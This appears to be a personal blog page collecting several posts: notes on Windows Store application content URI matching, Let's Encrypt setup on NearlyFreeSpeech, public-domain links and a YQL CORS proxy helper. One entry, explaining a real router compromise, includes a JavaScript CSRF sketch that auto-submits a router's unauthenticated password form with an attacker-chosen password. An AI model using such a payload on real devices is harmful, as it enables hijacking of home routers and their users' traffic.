Application Content URI Rules (ACUR from now on) define the bounds of the web content that makes up a Microsoft Store application. Package content via the ms-appx URI scheme is automatically considered part of the app, but if you have content on the web via http or https you can use ACUR to declare to Windows that those URIs are also part of your application. When your app navigates to URIs on the web, those URIs are matched against the ACUR to determine whether they are part of your app. The MSDN documentation for how matching is done on the wildcard URIs in the ACUR Rule elements is not very helpful, so here are some notes.
You can have up to 100 Rule XML elements per ApplicationContentUriRules element. Each has a Match attribute that can be up to 2084 characters long. The content of the Match attribute is parsed with CreateUri, and when matching against URIs on the web, additional wildcard processing is performed. I'll call the URI from the ACUR Rule the rule URI, and the URI found during app navigation that we compare it against the navigation URI.
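For reference, here's a minimal sketch of what the rules look like in the package manifest (the example.com URIs are placeholders, and the exact element namespace and the availability of the Type attribute vary by manifest version):
<ApplicationContentUriRules>
  <Rule Type="include" Match="https://example.com/" />
  <Rule Type="include" Match="https://*.example.com/app/" />
</ApplicationContentUriRules>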
The rule URI is matched to a navigation URI by URI component: scheme, username, password, host, port, path, query, and fragment. If a component does not exist on the rule URI then it matches any value of that component in the navigation URI. For example, a rule URI with no fragment will match a navigation URI with no fragment, an empty-string fragment, or a fragment with any value in it.
Each component except the port may have up to 8 asterisks. Two asterisks in a row count as an escape and match one literal asterisk. For the scheme, username, password, query, and fragment, an asterisk matches whatever it can within its component.
For the host, if the host consists of exactly one asterisk then it matches anything. Otherwise, an asterisk in a host only matches within its domain name label. For example, http://*.example.com will match http://a.example.com/ but not http://b.a.example.com/ or http://example.com/. And http://*/ will match http://example.com, http://a.example.com/, and http://b.a.example.com/. However, the Store places restrictions on submitting apps that use the http://* rule or rules with an asterisk in the second effective domain name label; for example, http://*.com is also restricted for Store submission.
For the path, an asterisk matches within a path segment. For example, http://example.com/a/*/c will match http://example.com/a/b/c and http://example.com/a//c, but not http://example.com/a/b/b/c or http://example.com/a/c.
Additionally for the path, if the path ends with a slash then it matches any path that starts with that same path. For example, http://example.com/a/ will match http://example.com/a/b and http://example.com/a/b/c/d/e/, but not http://example.com/b/.
If the path doesn’t end with a slash then there is no suffix matching performed. For example, http://example.com/a will match only http://example.com/a and no URIs with a different path.
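To make the wildcard behavior concrete, here's a sketch in JavaScript of my reading of the rules above. This is not the actual Windows implementation, and it doesn't enforce the 8-asterisk limit:
// Convert one rule URI component into a RegExp implementing the wildcard
// rules described above. separator is "\\." for the host, "/" for the
// path, and null for the other components.
function componentToRegExp(ruleComponent, separator) {
    var pattern = "^";
    for (var i = 0; i < ruleComponent.length; i++) {
        var c = ruleComponent.charAt(i);
        if (c === "*") {
            if (ruleComponent.charAt(i + 1) === "*") {
                pattern += "\\*"; // "**" escapes one literal asterisk
                i++;
            } else {
                // "*" matches whatever it can but not past a separator.
                pattern += separator ? "[^" + separator + "]*" : ".*";
            }
        } else {
            pattern += c.replace(/[.\\+?^$(){}|[\]]/, "\\$&");
        }
    }
    return new RegExp(pattern + "$");
}

function hostMatches(ruleHost, navigationHost) {
    if (ruleHost === "*") {
        return true; // a host of exactly one asterisk matches anything
    }
    return componentToRegExp(ruleHost, "\\.").test(navigationHost);
}

function pathMatches(rulePath, navigationPath) {
    var re = componentToRegExp(rulePath, "/");
    if (rulePath.charAt(rulePath.length - 1) === "/") {
        // A trailing slash means prefix matching: drop the "$" anchor.
        re = new RegExp(re.source.slice(0, -1));
    }
    return re.test(navigationPath);
}

// hostMatches("*.example.com", "a.example.com") === true
// hostMatches("*.example.com", "b.a.example.com") === false
// pathMatches("/a/*/c", "/a//c") === true
// pathMatches("/a/", "/a/b/c/d/e/") === true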
As part of parsing the rule URI and the navigation URI, CreateUri performs URI normalization: the hostname and scheme are lowercased (case matters in all other parts of the URI, where case-sensitive comparisons are performed), IDN normalization is performed, '.' and '..' path segments are resolved, and other normalizations are applied as described in the CreateUri documentation. For example, HTTP://EXAMPLE.com/a/./b/../c normalizes to http://example.com/a/c before matching.
Since I last posted about using Let's Encrypt with NearlyFreeSpeech, NFS has changed their process for setting TLS info. Instead of putting the various files in /home/protected/ssl and submitting an assistance request, there is now a command and a webpage for submitting the certificate info.
The webpage is https://members.nearlyfreespeech.net/{username}/sites/{sitename}/add_tls and has a textbox into which you paste all the cert info in PEM form: the domain key, the domain certificate, and the Let's Encrypt intermediate cert. Alternatively, that same info may be provided as standard input to nfsn -i set-tls.
To renew my certificate with the updated NFS process I followed the commands from Andrei Damian-Fekete's script, which depends on acme_tiny.py:
python acme_tiny.py --account-key account.key --csr domain.csr --acme-dir /home/public/.well-known/acme-challenge/ > signed.crt
wget -O - https://letsencrypt.org/certs/lets-encrypt-x3-cross-signed.pem > intermediate.pem
cat domain.key signed.crt intermediate.pem > chained.pem
nfsn -i set-tls < chained.pem
Because my certificate had already expired, I needed to comment out the section in acme_tiny.py that validates the challenge file. The filenames in the above map to the following:
account.key: the Let's Encrypt account private key
domain.csr: the certificate signing request for the domain
domain.key: the domain's private key
signed.crt: the newly signed domain certificate
intermediate.pem: the Let's Encrypt intermediate certificate
chained.pem: the domain key, signed certificate, and intermediate concatenated together for nfsn set-tls
2016-Nov-5: Updated post on using Let's Encrypt with NearlyFreeSpeech.net
I use NearlyFreeSpeech.net for my webhosting for my personal website and I've just finished setting up TLS via Let's Encrypt. The process was slightly more complicated than what you'd like from Let's Encrypt. So for those interested in doing the same on NearlyFreeSpeech.net, I've taken the following notes.
The standard Let's Encrypt client requires su/sudo access, which is not available on NearlyFreeSpeech.net's servers. Additionally, NFSN's webserver doesn't have any Let's Encrypt plugins installed. So I used the Let's Encrypt Without Sudo client. I followed the instructions listed on the tool's page with the addition of providing the "--file-based" parameter to sign_csr.py.
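The signing step looked something like the following (the file names here are mine, so check the tool's README for the exact options):
python sign_csr.py --public-key user.pub --file-based domain.csr > signed.crt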
One thing the script doesn't produce is the chain file, but the topic "Let's Encrypt - Quick HOWTO for NSFN" covers how to obtain that:
curl -o domain.chn https://letsencrypt.org/certs/lets-encrypt-x1-cross-signed.pem
Now that you have all the required files, on your NFSN server make the directory /home/protected/ssl and copy your files into it. This is described in the NFSN topic "provide certificates to NFSN". After copying the files and setting their permissions as described in the previous link, you submit an assistance request. For me it was only 15 minutes later that everything was set up.
After enabling HTTPS I wanted all HTTP requests to redirect to HTTPS. The normal Apache documentation on how to do this doesn't work on NFSN servers. Instead, the NFSN FAQ describes it in "redirect http to https and HSTS". You use X-Forwarded-Proto instead of the HTTPS variable because of how NFSN's virtual hosting is set up.
RewriteEngine on
RewriteCond %{HTTP:X-Forwarded-Proto} !https
RewriteRule ^.*$ https://%{SERVER_NAME}%{REQUEST_URI} [L,R=301]
Turning on HSTS is as simple as adding the HSTS HTTP header. However, the description in the above link didn't work because my site's NFSN realm isn't on the latest Apache yet. Instead I added the following to my .htaccess. After I'm comfortable with everything working well for a few days I'll start turning up the max-age to the recommended minimum value of 180 days.
Header set Strict-Transport-Security "max-age=3600;"
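For reference, 180 days is 15,552,000 seconds, so the eventual header should be something like:
Header set Strict-Transport-Security "max-age=15552000"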
Finally, to turn on CSP I started up Fiddler with my CSP Fiddler extension. It allows me to determine the most restrictive CSP rules I could apply and still have all resources on my page load. From there I found and removed inline script and some content loaded via http and otherwise continued tweaking my site and CSP rules.
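As a purely hypothetical example of the shape of the end result, the final policy might look something like this (the actual directives depend entirely on what your site loads):
Header set Content-Security-Policy "default-src 'self'; img-src https:"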
After I was done I checked out my site on SSL Labs' SSL Test to see what I might have done wrong or what needed improving. The first time I went through these steps I hadn't included the chain file, which the SSL Test told me about. I added that file to the files I had already generated from the Let's Encrypt client, made another NFSN assistance request, and 15 minutes later the SSL Test had upgraded me from 'B' to 'A'.
A bogus SoundCloud takedown anecdote and a brief history of and issues with US copyright law.
Another reminder that the rest of the Western world has a public domain day every year in which new IP enters the public domain
Various folks on OpenGameArt have converted the now public domain Glitch art assets into SVG and PNG.
According to the links within this article, although the root URI of the router requires authentication, the /password.cgi URI doesn’t and the resulting returned HTML contains (but does not display) the plaintext of the password, as well as an HTML FORM to modify the password that is exploitable by CSRF.
The attack… infected more than 4.5 million DSL modems… The CSRF (cross-site request forgery) vulnerability allowed attackers to use a simple script to steal passwords required to remotely log in to and control the devices. The attackers then configured the modems to use malicious domain name system servers that caused users trying to visit popular websites to instead connect to booby-trapped imposter sites.
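A sketch of how such a CSRF could work, with a made-up router address and form field (nothing here is taken from the actual exploit):
// Hypothetical: any page the victim visits can auto-submit the router's
// unauthenticated password form; no credentials are needed because
// /password.cgi skips authentication.
var form = document.createElement("form");
form.method = "POST";
form.action = "http://192.168.1.1/password.cgi"; // router's LAN address
var field = document.createElement("input");
field.type = "hidden";
field.name = "sysPassword"; // made-up field name
field.value = "attacker-chosen-password";
form.appendChild(field);
document.body.appendChild(form);
form.submit();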
Seized shirt!
For the feds, it’s not enough to simply seize domain names without warning or due process—they want to make sure everyone knows the website operators were breaking the law, even if that has yet to be proven in court. That’s why every domain that gets seized ends up redirecting to one of these dramatic warning pages, replete with the eagle-emblazoned badges of the federal agencies involved.
During formalization of the WebFinger protocol [I-D.jones-appsawg-webfinger], much discussion occurred regarding the appropriate URI scheme to include when specifying a user’s account as a web link [RFC5988].
…
acctURI = "acct:" userpart "@" domainpart
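So, for example, a hypothetical account would be written as acct:alice@example.com.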
Use of my old Hotmail account has really snuck up on me as I end up caring more and more about all of the services with which it is associated. The last straw is Windows 8 login, but previous straws include Xbox, Zune, SkyDrive, and my Windows Phone 7. I like the features and sync'ing associated with the Windows Live ID, but I don't like my old, spam-filled Hotmail email address on the Live ID account.
A coworker told me about creating a Live ID from a custom domain, which sounded like just the ticket for me. Following the instructions above I was able to create a new deletethis.net Live ID, but the next step of actually using this new Live ID was much more difficult. My first hope was there would be some way to link my new and old Live IDs so as to make them interchangeable. As it turns out there is a way to link Live IDs, but all that does is make it easy to switch between accounts on Live Mail, SkyDrive, and some other webpages.
Instead one must change over each service or start over depending on the service:
In Win8 you login with a Windows Live account. If you hook up a custom domain to a Live account you can login with that custom domain.
It's all quite shocking.
Fourth, when I explained that the blog publisher had received music from the industry itself, a government attorney replied that authorization was an “affirmative defense” that need not be taken into account by the government in carrying out the seizure. That was stunning.
Another Comedy Bang Bang preview clip this time with Zach Galifianakis.
One of the more limiting issues of writing client-side script in the browser is the same-origin limitation of XMLHttpRequest. The latest versions of all browsers support a subset of CORS to allow servers to opt in particular resources for cross-domain access. Since IE8 there's XDomainRequest, and in all other browsers (including IE10) there's XHR L2's cross-origin request features. But the vast majority of resources out on the web do not opt in using CORS headers, and so client-side-only web apps like a podcast player or a feed reader aren't doable.
One hack-y way around this I've found is to use YQL as a CORS proxy. YQL applies the CORS header to all its responses and among its features it allows a caller to request an arbitrary XML, HTML, or JSON resource. So my network helper script first attempts to access a URI directly using XDomainRequest if that exists and XMLHttpRequest otherwise. If that fails it then tries to use XDR or XHR to access the URI via YQL. I wrap my URIs in the following manner, where type is either "html", "xml", or "json":
yqlRequest = function (uri, method, type, onComplete, onError) {
    // Build a YQL query that fetches the target URI server-side; YQL's
    // response carries the CORS header so the browser will accept it.
    var yqlUri = "http://query.yahooapis.com/v1/public/yql?q=" +
        encodeURIComponent("SELECT * FROM " + type + ' where url="' + encodeURIComponent(uri) + '"');
    if (type === "html") {
        // For HTML, select the whole document via XPath.
        yqlUri += encodeURIComponent(" and xpath='/*'");
    }
    else if (type === "json") {
        // Ask for raw JSON back rather than a JSONP-wrapped response.
        yqlUri += "&callback=&format=json";
    }
...
This also means I can get JSON data itself without having to go through JSONP.
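For example, fetching a feed through this helper might look like the following (the URI and callbacks are placeholders):
yqlRequest("http://example.com/feed.xml", "GET", "xml",
    function (response) { /* consume the feed */ },
    function (error) { /* report the failure */ });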
This is Django Reinhardt’s Gypsy swing from the 30s and 40s on archive.org and it is all in the public domain. I didn’t know the term for the genre so it took me a while to find this.
There’s weird stuff you’d think is public domain but isn’t, including Martin Luther King Jr.’s “I Have a Dream” speech. FTA: “If you want to watch the whole thing, legally, you’ll need to get the $20 DVD. That’s because the King estate, and, as of 2009, the British music publishing conglomerate EMI Publishing, owns the copyright of the speech and its recorded performance.”
More amazing works entering public domain. A shame that US works take such an extreme amount of time.
“The syntax for allowed Top-Level Domain (TLD) labels in the Domain Name System (DNS) is not clearly applicable to the encoding of Internationalised Domain Names (IDNs) as TLDs. This document provides a concise specification of TLD label syntax based on existing syntax documentation, extended minimally to accommodate IDNs.” Still irritated about arbitrary TLDs.